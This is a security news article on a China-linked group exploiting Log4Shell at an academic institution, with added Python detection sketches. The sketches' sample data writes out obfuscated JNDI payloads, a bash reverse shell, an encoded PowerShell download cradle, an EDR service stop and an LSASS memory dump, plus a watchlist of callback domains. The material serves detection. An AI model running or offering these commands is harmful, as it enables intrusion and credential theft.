
China-linked APT group Aquatic Panda leverages Log4Shell in recent attack


China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution.

China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) in an attack aimed at a large academic institution.

According to the CrowdStrike OverWatch team, the APT group is using a modified version of the Log4j exploit published on GitHub on December 13.


The threat actors first used the exploit for reconnaissance.

In the attack against the unnamed academic institution, the threat actors targeted a VMware Horizon Tomcat web server that used the vulnerable Log4j library.

From the VMware Horizon instance, the attackers were observed performing multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org.

The researchers explained that multiple threat actors use publicly accessible DNS logging services such as dns[.]1433[.]eu[.]org to identify vulnerable servers: a lookup for the attacker's unique subdomain only reaches the attacker-controlled DNS service if the injected Log4j lookup string was evaluated on the target, so each query that arrives confirms a vulnerable host.
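Detection logic for the two indicators described above, added here as an illustration and not taken from CrowdStrike's report: it unwraps the Log4j lookup obfuscations attackers commonly use, scans Tomcat access-log lines for JNDI lookup strings, and scans resolver-log lines for queries under public DNS-logging services. All log lines are constructed samples; dns[.]1433[.]eu[.]org is the domain named in the article, while the other watchlist entries, the log formats and the client addresses are assumptions.

```python
"""Detection sketch for Log4Shell exploitation attempts against a Tomcat front end
and for the DNS-based connectivity checks that follow a successful lookup.
All log lines below are constructed samples, not data from the incident."""
import re
from urllib.parse import unquote

# Log4j lookup obfuscations seen in the wild: ${x:-d} evaluates to "d" and
# ${lower:x} / ${upper:x} evaluate to x (case is irrelevant for the final
# case-insensitive match).  They are unwrapped repeatedly until nothing changes.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)",
                   re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and nested-lookup obfuscation so ${jndi:...} becomes visible."""
    s = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), _DEFAULT_LOOKUP.sub(r"\1", s))
        if new == s:
            break
        s = new
    return s


def scan_access_log(lines):
    """Return (client_ip, jndi_scheme, callback_host) for each line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        m = _JNDI.search(normalize_lookups(line))
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1).lower(), m.group(2)))
    return hits


# Public DNS-logging / callback services.  dns.1433.eu.org is the one named in the
# article; the other entries are assumed watchlist members for illustration.
CALLBACK_DOMAINS = ("dns.1433.eu.org", "dnslog.cn", "interact.sh", "burpcollaborator.net")
_DNS_LOG = re.compile(r"client=(?P<client>\S+)\s+query=(?P<qname>\S+)")


def scan_dns_log(lines, watchlist=CALLBACK_DOMAINS):
    """Return (client, qname, matched_domain) for queries at or under a watchlisted domain."""
    hits = []
    for line in lines:
        m = _DNS_LOG.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        for dom in watchlist:
            # Suffix match on a label boundary so "dns.1433.eu.org.example" is not a hit.
            if qname == dom or qname.endswith("." + dom):
                hits.append((m.group("client"), qname, dom))
                break
    return hits


# Constructed Tomcat access-log lines (combined format) and resolver-log lines.
ACCESS_LOG = [
    '10.0.0.5 - - [14/Dec/2021:10:00:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Dec/2021:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/o}"',
    '198.51.100.23 - - [14/Dec/2021:10:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${::-l}dap://198.51.100.23:1389/o}"',
    '198.51.100.23 - - [14/Dec/2021:10:00:05 +0000] '
    '"GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
]
DNS_LOG = [
    "2021-12-14T10:00:01Z client=10.0.0.7 query=www.example.edu. type=A",
    "2021-12-14T10:00:06Z client=10.0.0.7 query=k7q2x.dns.1433.eu.org. type=A",
    "2021-12-14T10:00:07Z client=10.0.0.7 query=k7q2x.dns.1433.eu.org. type=AAAA",
    "2021-12-14T10:01:00Z client=10.0.0.9 query=dns.1433.eu.org.example. type=A",
]

if __name__ == "__main__":
    for hit in scan_access_log(ACCESS_LOG):
        print("JNDI lookup from %s via %s -> %s" % hit)
    for hit in scan_dns_log(DNS_LOG):
        print("callback DNS query from %s: %s (%s)" % hit)
```

The access-log scan is the noisy side (scanners spray these payloads at everything); the DNS scan is the high-signal side, because a Horizon host that resolves a name under a DNS-logging service has already evaluated an attacker-supplied lookup, which is exactly the connectivity check the article describes.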

The attackers then executed multiple Linux commands on the Windows host running the Apache Tomcat service, some of them intended to retrieve hacking tools from remote infrastructure.

“The threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat actor tooling hosted on remote infrastructure.” reads the analysis published by CrowdStrike. “Our CrowdStrike Intelligence team later linked the infrastructure to the threat actor known as AQUATIC PANDA.”

AQUATIC PANDA conducted reconnaissance on the host using native OS binaries and also attempted to stop a third-party endpoint detection and response (EDR) service.

The threat actor then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware and three files with VBS extensions from remote infrastructure.

The files are a reverse shell, which was loaded into memory via DLL search-order hijacking.

The APT group also made multiple attempts at credential harvesting by dumping the memory of the LSASS process using living-off-the-land binaries, and used WinRAR to compress the memory dump for later exfiltration.
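The host-side chain above (a shell spawned by the web server process, curl/wget downloads, a Base64-encoded PowerShell command, an EDR service stop, an LSASS memory dump via a living-off-the-land binary, and WinRAR compression of the dump) as detection logic over process-creation events, added here as an example and not code from CrowdStrike or the threat actor. The events are constructed; the Horizon Tomcat service binary name, the EDR service name, the comsvcs.dll MiniDump technique, the PID, the IP addresses and the file paths are assumptions chosen to illustrate the pattern, not indicators from the report.

```python
"""Detection sketch for the post-exploitation steps described above, applied to
constructed process-creation events (Sysmon Event ID 1 style fields).  Not code
from CrowdStrike or the threat actor; names, paths and the PID are assumptions."""
import base64
import re

# Parents that should never spawn shells or downloaders on a Horizon server.
# ws_TomcatService.exe as the Horizon Tomcat service binary is an assumption.
WEB_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe", "java.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "sh.exe", "curl.exe", "wget.exe"}

_ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|\.vbs\b",
                       re.IGNORECASE)
_SERVICE_STOP = re.compile(r"\b(?:sc(?:\.exe)?\s+stop|net(?:\.exe)?\s+stop|stop-service|taskkill)\b",
                           re.IGNORECASE)
# comsvcs.dll MiniDump and procdump are well-known LOLBin ways to dump LSASS; the
# article does not say which binary the actor used, so both are assumed patterns.
_LSASS_DUMP = re.compile(r"comsvcs(?:\.dll)?.*minidump|procdump.*lsass|lsass.*\.dmp", re.IGNORECASE)
_ARCHIVE_DUMP = re.compile(r'\b(?:rar|winrar)(?:\.exe)?"?\s+a\s.*\.dmp', re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of labels an event triggers; an empty list means nothing matched."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    labels = []
    if parent in WEB_PARENTS and image in SHELLS:
        labels.append("webserver_spawned_shell")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        labels.append("encoded_powershell")
        cmd = cmd + " " + decoded          # match download cradles inside the decoded payload too
    if _DOWNLOAD.search(cmd):
        labels.append("remote_download")
    if _SERVICE_STOP.search(cmd):
        labels.append("service_stop")
    if _LSASS_DUMP.search(cmd):
        labels.append("lsass_dump")
    if _ARCHIVE_DUMP.search(cmd):
        labels.append("dump_archived")
    return labels


def scan_events(events):
    """Return (index, labels) for every event that triggered at least one label."""
    out = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            out.append((i, labels))
    return out


def make_encoded(ps: str) -> str:
    """Encode a PowerShell command the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample chain.  IPs are documentation ranges; the EDR service name,
# the LSASS PID and the temp paths are placeholders.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.vbs')"
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"ParentImage": TOMCAT, "Image": CMD,
     "CommandLine": 'cmd.exe /c "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe http://203.0.113.10/s.sh -o C:\Windows\Temp\s.sh"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + make_encoded(STAGE2)},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc.exe stop EdrAgentSvc"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\l.dmp full"},
    {"ParentImage": CMD, "Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a -hpSecret C:\Windows\Temp\out.rar C:\Windows\Temp\l.dmp'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for i, labels in scan_events(EVENTS):
        print(i, EVENTS[i]["Image"].rsplit("\\", 1)[-1], labels)
```

Each rule on its own is weak (administrators stop services and run encoded commands too); the value is in the sequence, which is why the sample keeps the events in the order the article describes and why the parent-process check anchors the chain to the Tomcat service that should never be spawning cmd.exe in the first place.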

The good news is that the attack was spotted by the researchers, who alerted the targeted organization; it quickly remediated the vulnerable system.

“Throughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – hacking, AQUATIC PANDA)